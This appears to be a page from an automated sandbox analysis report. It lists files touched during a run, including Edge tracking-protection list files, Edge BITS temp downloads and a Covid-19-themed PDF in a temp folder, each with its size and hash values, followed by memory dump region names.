2b4a47b82cbe70e34407c7df126a24007aff8b45d5716db384d27cc1f3b30707

SHA512
4df2ce734e2f7bc5f02bb7845ea801b57dcf649565dd94b1b71f578b453ba0a17c61ccee73e7cff8f23cdd6aa37e55be5cb15f4767ff88a9a06de3623604fbf0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Mu\Social
Filesize
999B

MD5
152b745da17397ed5a2f3059bb157600

SHA1
47bf4e575ba1acf47dcc99f1800f753b4cc65ef6

SHA256
ef994058a637f7b1b47c31c8670977084d1f86cc21a196920aa87f8ed31e98e8

SHA512
4984a8a46eb452b3c62f2c2ca8c9d999de37c39895ad9a9ed91d12a7731b1cd227f335829f7a6927f19cd8bf4dd7d6749fc853461a46fc97853d5b9e23171d31

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Advertising
Filesize
459B

MD5
d024831cae8599f0edee70275d99e843

SHA1
69e08b543802b130da5305cbb0140bda5601079c

SHA256
0b75817b9ce2164f52e537c66bbff0fe53024bf9a00fb193efd63fe48f34a978

SHA512
ee1096446f6a17bc3fde9aadb418ca4b2db5132cdde1e429300487aaf4d8b9865a3bbc95d3a3198cde137a6395f69c035b74a72f74edc22a490bccc3320b0b03

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Analytics
Filesize
50B

MD5
4cefbb980962973a354915a49d1b0f4d

SHA1
1d20148cab5cdadb85fad6041262584a12c2745d

SHA256
66de8db363de02974a1471153112e51f014bb05936ce870c433fd9a85b34455a

SHA512
6a088bbc6c40454165ddee3183667d2997dca5fcc8312f69e3c2397e61255e49b5146b24c2c64cd3c8867289e3abfdf1155e47722fdd8276f96d51e8f311d4b0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Content
Filesize
36B

MD5
7f077f40c2d1ce8e95faa8fdb23ed8b4

SHA1
2c329e3e20ea559974ddcaabc2c7c22de81e7ad2

SHA256
bda08f8b53c121bbc03da1f5c870c016b06fa620a2c02375988555dd12889cdf

SHA512
c1fb5d40491ae22a155a9bd115c32cbe9dbcba615545af2f1a252475f9d59844763cd7c177f08277d8ef59e873b7d885fda17f2a504d9ec2c181d0f793cb542b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Cryptomining
Filesize
32B

MD5
4ec1eda0e8a06238ff5bf88569964d59

SHA1
a2e78944fcac34d89385487ccbbfa4d8f078d612

SHA256
696e930706b5d391eb8778f73b0627ffc2be7f6c9a3e7659170d9d37fc4a97b5

SHA512
c9b1ed7b61f26d94d7f5eded2d42d40f3e4300eee2319fe28e04b25cdb6dd92daf67828bff453bf5fc8d7b6ceb58cab319fc0daac9b0050e27a89efe74d2734e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Entities
Filesize
2KB

MD5
ba60431b366f83677a5bf1a2e4601799

SHA1
83f828c27de5429e25c38c36ba77e069d5c7b2de

SHA256
ab895ef5f75efd49dbb4fcdf7529e50ca622d13433e067bcf8a1f1127a944da3

SHA512
aa9ff0374fb3d4bff7ee5a78dd5ace340da4af1a844f453a40b2723a91b32e6e3f4bd736fb3f3cb210b016109660a7b5cc8440901c6bb410e61530286a4e0200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Fingerprinting
Filesize
110B

MD5
a004023825237dadc8f934758ff9eaf2

SHA1
c981a900b5ce63884635cedfe5ba722416021cb2

SHA256
3c4e82aae615a7bed985b4544afecb774b728df1cc9f7561ea25b97482119ef7

SHA512
e49667fca51a6497ccae9b881d679b857c025f2945ab93c9a6769b1c0a632329993daefab6eda9ed70a32a75630d7b3d93dda5acda8ff87ffe5f090ca7b35e4f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Other
Filesize
75B

MD5
c6c7f3ee1e17acbff6ac22aa89b02e4e

SHA1
bdbd0220e54b80b3d2ffbbddadc89bfbb8e64a8b

SHA256
a2f9f27d6938a74979d34484bced535412969c2533dc694bfa667fe81d66d7d4

SHA512
86ed28ffdd00b4a397a20968792fcd30dd4a891a187a7789c00c88b64689b334a11fa087eb54ccee813c181cf891b43184dde7af9a6f33caed2a71e2c445a7b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Social
Filesize
35B

MD5
976b1cf7e3442f88cd8ba26d3f0965bb

SHA1
b75438dc71de4ac761d94a215ddbffadcd1225b0

SHA256
decde67630f29fc003cb1f2ccbd7371a05079985a9cce93ec93c4fadd8dc5541

SHA512
d0472fed72e1eb0a7747a693a0e654fbe92dd028db3cc42377810d90474dd4099ac981cca333eb52c18e75ed04a1f1f79f3bf5957fe8b16086f1252b3454b8d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Trust Protection Lists\1.0.0.21\Sigma\Staging
Filesize
519B

MD5
9ca5eb41a53645be63d247ad8a9a7869

SHA1
2e98b04b5a2efb04d20bc7fe51b05c4e4841205b

SHA256
f67c58a61ddef715b01debc66ddc0e3c365295ac9870328f6b8bdbcb02a6b8c9

SHA512
7dd7d295ccce957490f025eef124b22c809f140a96003126b801bbbdd94eb2115ee59e7d16dd1f020b1d6eaaff66853b9de2cbf7092c1692f40dbe21ab346fd8

Download Submit
C:\Users\Admin\AppData\Local\Temp\Survey-Paper-Covid-19.pdf
Filesize
16KB

MD5
b60ee43aeeb8cebf1ebaca24d7cb0f70

SHA1
6fd4e5128893ffa762659928c7a5b77efe0ded6e

SHA256
9b372997cc2d3e9dd18e925d27543bcd77bd3ab35f75b78f82832b73d7b1336d

SHA512
d9a4bcee700816ecee07428b2ba4b8da05013bccca1587817584aeb90538aa5e47e33afeb8e879484839b965057e28c21a8d4beecd8fdbc37f6cae953a0ca964

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1068574658\42e51524-755c-47cb-84c5-ae02ffdda453
Filesize
818KB

MD5
1f7f791122ac738c2f50ab552dbee1b1

SHA1
005ebb1a54386d8a3fa65380462842f6e083273e

SHA256
6615e489c4f6b0e1a63bc78f89a200fadfefa12da08454b4f0ffff1ffa026f21

SHA512
d3a460c599fe00119845327364641b527a1082cf0c9bf9e19d2cf5a4d79f7077548dd7ef265d3761f291b558922a2ea5b8b4ba49e078cf8ad7c85c88a68d1d70

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1103843770\b22f5f18-f7ea-4290-929d-b13c03908334
Filesize
1KB

MD5
a36d70bcd9333175811c53122f7d2c1d

SHA1
9a9a0c0ac2fc1db6e7b78868c8d4c96d747b8f1c

SHA256
26123bef7d73536450862d2c4d44963d720aa80b6fc2d8496f559cb9c1fdeb00

SHA512
e69aee2d91c50dd63030bd64cd12b5120c1db9871caf3c26b2cbf29ff96891b5f2e7d1388e4b731f77d7fb24904f379a6a8d5c1b2aacf8a8501fd0111ab0caf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1108606819\561b267d-84e8-4c62-b0b7-4e064be02aa2
Filesize
22KB

MD5
e1e5c20a754c68872e8abbf1d84875e8

SHA1
3cc98edfc0a925f39c7b78ae4ec4e4425b0fd661

SHA256
dd94940b6330d77e7797a60de1183cca7b0f71ab247bea8f9ae0ff30eafc379f

SHA512
59d2ce41bfc0764a699ad0ea6eb0ff38ac05c8dfdc15004ccffc4182dc53bf5cacd77274a1d24f0cf0489edf2abea99efb0d4af7ba7d84c21e793c89273a9279

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1263278112\2132f61f-f790-4ae6-a355-8cf9a1533800
Filesize
952KB

MD5
1a9c030cf025d340ff394cd9e5b664f3

SHA1
c1e8490662903d90de97760cb3102426f2784bd9

SHA256
a81d1959892ae4180554347df1b97834abba2e1a5e6b9aeba000ecea26eabecc

SHA512
7a9584c96849b1c8c623119bea4255a628e0f36d3a5f670e9c6a20f84d250fee859751a521322864b1577d7ca3ecdd7ee805c0f35bd7d74ddf43afc9f2abf8cb

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1383486776\dde93974-5cbc-4ecc-898f-436e62207c34
Filesize
36KB

MD5
90a84d9fd254f82926ebd56b92b59b65

SHA1
a0c29a54a638478680101348cd253f3f2369b0aa

SHA256
2e57d294ae2ce37ac58485ec6052861ef075fea318f9fce8fafcd6bdd86ebf57

SHA512
3096dfe61aa951c331e6c1479a0812da61cd27a6b8ee16bd9896df7e6c77fab95c7ca91fa922f9a50ee10ff43fe59d3b0a03b8ef2ac91166c5eb53d842dcdfba

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_1884419357\73e73124-8629-4742-8ed2-98964b16aa1c
Filesize
6.2MB

MD5
5727a5a06cfee4f93421e27a74afad10

SHA1
52cd50ef6f38a72603c4f82dbe368a7d18429ed1

SHA256
126c6b7f46c5fb5fd7ee6fff6f1dee85806ee40328ef6ec0a4003a185a727905

SHA512
7e7b92db09a38b2c14d2f18b146b33804a3e80e51e5776652b011889be4a848d34a6b3f61d46104c8512112e5797b58f96500b2ca0e3bebee5f03d70b7526db0

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_2028349882\b7f07b26-d34f-490c-8527-987fb2262813
Filesize
58KB

MD5
d7c0f6591e7755dcb8935c5452c5f644

SHA1
b90059f7c4d9bef1fb1c1e3d63c704ca58bce116

SHA256
155aadeb31bc950db003f59f2806a8331c73c80be7b4960eab3bfb5b6dee0440

SHA512
df3b41653ac51eec45f7d62e95cdd142e1333472e6c24a09314fa23f8dc8a43cca4c2e629867a3e0da174021232d25460e8297aa60ccc1a8a61001a17ca77c22

Download Submit
C:\Users\Admin\AppData\Local\Temp\edge_BITS_3856_821886392\f08b21db-8a96-416f-86dc-4301cb9925a1
Filesize
378KB

MD5
667b21c5101befebcd6470a748092051

SHA1
7a3cc9ff06845ad48876bae8e07dbd8a8c874ab6

SHA256
82497265352e024349df20fcb72104978e8835933bf7497e11d8b1e0a8617aae

SHA512
06d3aed70aee3e68b58c1581570aed7da7ed90eef65a9c799674bc642e77e93746337485b663b9ecbf5cf22c1d57d864334acc0d1cf2a36120df8b5325de88d5

Download Submit
\??\pipe\LOCAL\crashpad_3856_ZBKBWNBSYOPETMNV
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/456-173-0x00000249ADAC0000-0x00000249ADAC4000-memory.dmp

Filesize
16KB

Download
memory/456-140-0x00000249AB5C0000-0x00000249AB5C4000-memory.dmp

Filesize
16KB

Download
memory/456-139-0x00000249AB260000-0x00000249AB270000-memory.dmp

Filesize
64KB

Download
memory/456-138-0x00000249AA960000-0x00000249AA970000-memory.dmp

Filesize
64KB

Download
memory/456-174-0x00000249ADAC0000-0x00000249ADAC4000-memory.dmp

Filesize
16KB

Download
memory/1620-135-0x00007FFEB36C0000-0x00007FFEB4181000-memory.dmp

Filesize
10.8MB

Download
memory/1620-136-0x000001FA71D36000-0x000001FA71D37000-memory.dmp

Filesize
4KB

Download
memory/4476-142-0x00007FFED59E0000-0x00007FFED59E1000-memory.dmp

Filesize
4KB

Download